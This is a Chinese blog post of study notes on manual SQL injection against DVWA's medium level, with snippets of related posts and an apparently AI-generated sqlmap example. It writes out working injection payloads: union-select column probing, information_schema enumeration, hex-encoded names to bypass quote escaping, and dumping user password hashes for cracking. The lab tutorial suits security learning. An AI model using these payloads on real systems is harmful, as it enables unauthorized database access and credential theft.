SQL injection on DVWA (medium Level)

最新推荐文章于 2025-03-12 10:38:35 发布
最新推荐文章于 2025-03-12 10:38:35 发布
阅读量2.3k 收藏 1
点赞数 1
分类专栏: DVWA SQL Injection学习笔记 文章标签: SQL Injection DVWA
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/youb11/article/details/45696603
版权
本文详细介绍了如何通过SQL注入攻击获取数据库信息,包括利用union select语句查询表结构、获取数据库名称及表单列名等技术手段。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

medium与low的区别在于对对输入的数据进行了转义处理,多了$id = mysql_real_escape_string($id);  这句。

在这里输入‘会有如下结果:


不用担心还有好多是可以用哒~~

输入1 or 1=1:


得到了所有id对应的用户。


接下来用union select

输入 1 or 1=1 union select 1,2--

可以正常输出

但是输入1 or 1=1 union select 1,2,3-- 却得到如下结果

说明这里的数据表是两列哟~~~


接下来就可以用user(),database(),version()查看信息了:



查询information_schema系统表,获得MySQL数据库中每一个表名以及每一列的名字


为了便于查找可以这样:

输入1 or 2=1 union select 1,concat(table_name,0x0a,column_name) from information_schema.columns,得到的结果为



以上结果还是很多,可以尝试如下办法获得MySQL中所有的数据库:

输入1 or 2=1 union select table_schema,null from information_schema.tables

显然这里用的数据库是dvwa~


既然已经知道数据库的名字,也就不用大海捞针揣测它各个表的名字了

输入1 or 2=1 union select table_name,null from information_schema.tables where table_schema=0x64767761    这个0x64767761是dvwa的十六进制表示

这里使用十六进制表示的因为这里应该填入数据库名,应该是一个字符串,如果写dvwa则要在它两端加上单引号,这样才会被识别为string,但是单引号会被过滤掉,所以直接写string会报错。



现在查看users这个表单中有哪些列(实际上前面以及找到了= =!重复一下又怎样)

输入:1 or 2=1 union select 1,concat(table_name,0x0a,column_name) from information_schema.columns where table_name=0x7573657273

咳咳!后面table_name不能直接用users哦,会报错的

正确的输出是

users里面共有6列哟~


接下来获得用户名和密码:

输入1 or 2=1 union select 1,concat(first_name,0x0a,password) from users

也可以输入1 or 2=1 union select first_name,password from dvwa.users #   获得


在http://www.md5decrypter.com/上查一下

一些常用的密码hash破解是没有问题的



DVWA SQL Injection Medium
Ramona的博客
11-27 513
Mdeium 基本的步骤及知识点在上节已经提到过这里不再赘述:https://blog.youkuaiyun.com/WQ_BCJ/article/details/84554777 1)与low级别不同,本次采用的是下拉按钮的方式,限制了用户的输入,通过url可以发现并没有?id=.....类似的参数所以不是get方法,那么我们可以通过火狐的hackbar提交post数据试一试: 2)通过以上页...
DVWA通过攻略之SQL注入
热门推荐
勿山几已
05-24 1万+
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
DVWASQL Injection
baynk的博客
10-29 1758
汇总链接: https://baynk.blog.youkuaiyun.com/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ SQL ...
DVWA SQL注入(medium
最新发布
fqefeq的博客
03-12 1388
若将ID值改为1’and ‘1’ =’1(或1’and 1 =1#),正常返回;改为1’ and’1’=’2(或1’and 1=2#),不正常返回,则证明其为字符型注入(一般用#方法)后台语句:select Firstname,Surname from users where id=1 union select 1,2#若将ID值改为1 and 1 =1,正常返回;改为1 and 1=2,不正常返回,则证明其为数字型注入。输入1 union select 1,2#1 order by 2# 结果:正常。
dvwaSQL Injection
kukudeshuo的博客
03-03 272
dvwaSQL Injection Security Level: low 由源代码可知,对字符串没有进行任何过滤 输入 1' and 1=1# 结果 ID: 1' and 1=1# First name: admin Surname: admin 输入 1' and 1=2# 结果为空白,说明存在SQL注入漏洞 判断字段数 1' order by 2# 结果: ID: 1' order by 2# First name: admin Surname: admin 1' order by 3
dvwasql injection
Alsn86的博客
01-18 301
dvwasql injection low,php,没有任何过滤,把sql搜索到的所有记录都输出来 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $html .=$query;//自
DVWASQL Injection
weixin_42075643的博客
02-19 382
SQL注入基础知识
DVWA通关--SQL盲注(SQL Injection(Blind))
箭雨镜屋
07-11 3754
LOW 通关步骤 代码分析 MEDIUM 通关步骤 代码分析 HIGH 通关步骤 代码分析 IMPOSSIBLE 代码分析
DVWASQL注入(SQL Injection
qq_39682037的博客
03-20 2275
SQL注入(SQL InjectionSQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 Security Level: low 测试流程 输入1 输入2 输入1‘,无响应 输入1 and 1=1 输入1 and 1=2 故猜测sql语句结构为 select First name的列名 and Surname的列名 from ...
mysql 猜解字段,DVWA全等级SQL Injection(Blind)盲注--手工测试过程解析
weixin_42610671的博客
03-17 773
一、DVWA-SQL Injection(Blind)测试分析SQL盲注 VS 普通SQL注入:普通SQL注入SQL盲注1.执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等2.一般在页面上直接就会显示执行sql语句的结果1.一般情况,执行SQL盲注,服务器不会直接返回具体的数据库错误or语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的盲注...
渗透测试学习2---DVWASQL Injection
正在学习的路上...
04-26 333
1.low PHP源码: <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; ...
DVWA下的SQL注入
07-25
SQL
DVWA——SQL Injection
qq_41007744的博客
05-23 445
SQL InjectionLow&lt;?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE ...
DVWA-SQL Injection
m0_49025459的博客
04-16 1827
LOW 判断注入是否存在 1' order by 2 # 1' order by 3 # 2的时候正常回显,但是3的时候报错,证明存在两个回显点,查询数据库 1' union select 1,database() # 查到数据库之后查询,查表名 1 union select 1,table_name from information_schema.tables where table_schema=database() # 两张表,先查表里的字段语句一样,改一下表.
DVWA sql注入-MEDIUM
m0_46616663的博客
05-25 577
1.判断是否存在sql注入漏洞 可以看到不是get型数据提交方式了,查询数据也变成了下拉表单的方式。 burpsuite抓包吧那就 常规判断有无注入及其类型 推测有转义符转义 为数字型注入 数据库字段为2 获取数据库信息 1'union select version(),@@version_compile_os# 查询用户名和数据库名 1 union select database(),user()# 爆表...
DVWA-----SQL Injection(SQL手工注入)
m0_65712192的博客
11-21 9657
DVWA-----SQL Injection(SQL手工注入)
DVWA sql注入 (Medium
gclome的博客
07-05 3389
上节虽然写了low,可是发现自己对判断是否有注入点还有判断是字符型注入或数字型注入还是不太清楚,于是又找了一个讲解: https://www.cnblogs.com/qq3285862072/p/9439573.html 现在开始做mediumSQL注入 由于上面不方便直接输入,于是用burpsuite进行拦截然后修改 1.改成1'改成1 and 1=1 改成1 and 1=2 则可以判断为数字...
dvwa靶场sql盲注medium级别
12-28
### DVWA SQL Blind Injection Medium Level Attack Method Tutorial In the context of DVWA (Damn Vulnerable Web Application), exploiting a SQL blind injection vulnerability at the medium difficulty level involves understanding how to interact with the application and craft specific payloads that can infer database structure or content based on true/false responses. The command provided serves as an example payload used within such attacks, specifically designed to retrieve table names from the current database schema by leveraging conditional logic in queries: ```sql select table_name from information_schema.tables where table_schema=database()[^1] ``` For executing this type of attack against DVWA's SQLi Blind challenge set to 'Medium', one approach is using automated tools like SqlMap which simplifies the process significantly. An invocation might look similar to what has been shared previously: ```bash py3 sqlmap.py -u "http://192.168.123.20/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=248dmjg65dksvfvf8kk0k7vqj0; security=low" --current-db[^2] ``` This tool automates much of the work involved in detecting vulnerabilities, extracting data through time-based boolean conditions without direct output feedback, and even taking over databases under certain circumstances—all while adhering to user-defined constraints regarding legality and ethics. When performing manual exploitation for educational purposes only, consider crafting custom scripts or modifying existing ones according to your environment setup. The key lies in constructing queries that cause different behaviors depending on whether they evaluate to true or false, allowing inference about underlying structures indirectly via side-channel observations. --related questions-- 1. How does changing the security level affect the effectiveness of SQL injection techniques? 2. What are some common defenses implemented against SQL injections? 3. Can you explain more about Information Schema Tables and their role in discovering database objects during penetration testing? 4. Are there any particular challenges associated with exploiting blind SQL injections compared to error-based methods?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值